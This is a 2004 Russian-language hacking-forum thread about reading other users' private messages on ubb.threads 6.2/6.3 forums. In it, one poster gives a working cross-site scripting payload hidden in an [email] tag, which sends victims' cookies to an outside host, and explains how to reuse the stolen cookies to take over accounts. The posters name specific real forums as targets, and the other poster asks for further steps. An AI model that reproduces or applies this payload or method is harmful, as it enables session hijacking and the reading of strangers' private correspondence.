Как прочесть приваты на ubb.threads™ 6.2/6.3

Discussion in 'Песочница' started by HELLer, 18 Jul 2004.

Thread Status:
Not open for further replies.
  1. HELLer

    HELLer New Member

    Joined:
    18 Jul 2004
    Messages:
    3
    Likes Received:
    0
    Reputations:
    1
  2. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    для http://forum.isurgut.ru :
    Есть уязвимость в теге
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>[b]Исходный код[/b] </td></tr><tr><td id="CODE">[email]"`/=`[email protected]
      ` style=`background:url("javascript:i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;")` [/QUOTE]<span id='postcolor'>
    Получаем куки, заменяем их у себя в браузере (например програмкой CookieEditor, качать здесь http://antichat.ru/progs.shtml ), получаем доступ к приватным ящикам.
     
  3. HELLer

    HELLer New Member

    Joined:
    18 Jul 2004
    Messages:
    3
    Likes Received:
    0
    Reputations:
    1
    c00l! [​IMG]
    Если можно - чуть подробнее план действий пжлст. Как именно через куки доступ получить? Прогу скачал, посмотрел.
    Да, и вот ещё один сайт нашёл, на нём можно по приваткам полазить http://forum.investo.ru/ubbthreads.php?Cat= ???
    My best 2 U [​IMG]
     
Thread Status:
Not open for further replies.